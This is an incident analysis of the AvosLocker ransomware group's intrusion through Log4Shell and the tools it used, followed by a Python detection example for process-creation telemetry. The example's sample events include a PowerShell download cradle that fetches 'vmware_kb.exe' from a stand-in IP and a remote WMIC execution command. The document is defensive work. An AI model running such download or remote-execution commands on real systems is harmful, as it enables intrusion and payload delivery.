Avos is a ransomware group first identified in 2021, initially targeting Windows machines. More recently, a new variant of AvosLocker, the ransomware named after the group, has also been targeting Linux environments. Well-funded and financially motivated, Avos has been active since June 2021 and follows the ransomware-as-a-service (RaaS) model, running an affiliate program to recruit potential partners. The announcement of the program describes the features of the ransomware and lets affiliates know that AvosLocker operators will handle negotiation and extortion. The user “Avos” has also been observed trying to recruit individuals on the Russian-language forum XSS.
Typically, Avos uses spam email campaigns as the initial infection vector to deliver its ransomware. In this particular incident, however, the initial vector was an ESXi server exposed to the internet through VMware Horizon Unified Access Gateways (UAG), which were vulnerable to Log4Shell.
During the initial phases of the attack the threat actor took numerous steps to gain a foothold on the victim's network. Several other payloads and malicious tools were observed on endpoints, along with the use of living-off-the-land binaries (LoLBins). Several PowerShell scripts downloaded additional files, including Mimikatz, a Sliver payload labeled “vmware_kb.exe”, and a .zip archive called “IIS Temporary Compressed Files.zip” containing Cobalt Strike beacons and a port scanner labeled “scanner.exe.” This port scanner, SoftPerfect Network Scanner, is a commercially available product that Avos is known to deploy. Later that same day, the attackers used WMIC to modify administrative settings on both a local and a remote host, behavior indicative of the first stages of lateral movement.
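The activity above (PowerShell download cradles fetching the named payloads, then WMIC run against a remote host) is the kind of pattern a detection engineer would hunt for in process-creation telemetry. The following is an added detection example, not code from the original report; the events and the hostnames and URL in them are constructed, and the rule names are hypothetical.

```python
import re

# Constructed sample process-creation events, not real telemetry:
# (host, parent_image, image, command_line). 198.51.100.7 is a documentation address.
EVENTS = [
    ("ws01", "explorer.exe", "powershell.exe",
     'powershell -c "(New-Object Net.WebClient).DownloadFile('
     "'http://198.51.100.7/vmware_kb.exe','C:\\Windows\\Temp\\vmware_kb.exe')\""),
    ("ws01", "cmd.exe", "wmic.exe",
     'wmic /node:"srv02" /user:corp\\admin process call create "cmd /c whoami"'),
    ("ws01", "cmd.exe", "wmic.exe", "wmic /node:localhost os get caption"),
    ("ws01", "services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
]

# Common PowerShell download primitives seen in download cradles.
DOWNLOAD_PRIMITIVES = re.compile(
    r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Start-BitsTransfer",
    re.IGNORECASE)
# Artifact names reported in this incident (lower-cased for matching).
DROPPED_NAMES = {"vmware_kb.exe", "iis temporary compressed files.zip", "scanner.exe"}
# WMIC's /node: switch selects the machine the command runs against.
REMOTE_NODE = re.compile(r'/node:"?([^\s"]+)"?', re.IGNORECASE)


def remote_wmic_target(host, cmdline):
    """Return the remote host named by /node:, or None if local/absent."""
    m = REMOTE_NODE.search(cmdline)
    if not m:
        return None
    target = m.group(1).strip().lower()
    if target in ("localhost", "127.0.0.1", ".", host.lower()):
        return None
    return target


def detect(events):
    """Run the three rules over events; return (rule, host, detail) tuples."""
    hits = []
    for host, _parent, image, cmdline in events:
        img, low = image.lower(), cmdline.lower()
        if img == "powershell.exe" and DOWNLOAD_PRIMITIVES.search(cmdline):
            hits.append(("powershell_download_cradle", host, cmdline))
        if img == "wmic.exe":
            target = remote_wmic_target(host, cmdline)
            if target:  # remote execution via WMIC: lateral movement candidate
                hits.append(("wmic_remote_execution", host, f"{host} -> {target}"))
        for name in DROPPED_NAMES:
            if name in low:
                hits.append(("known_avos_artifact", host, name))
    return hits
```

Running `detect(EVENTS)` flags the download cradle, the `vmware_kb.exe` artifact it fetches, and the WMIC call against `srv02`, while the local `/node:localhost` query and the service host are left alone.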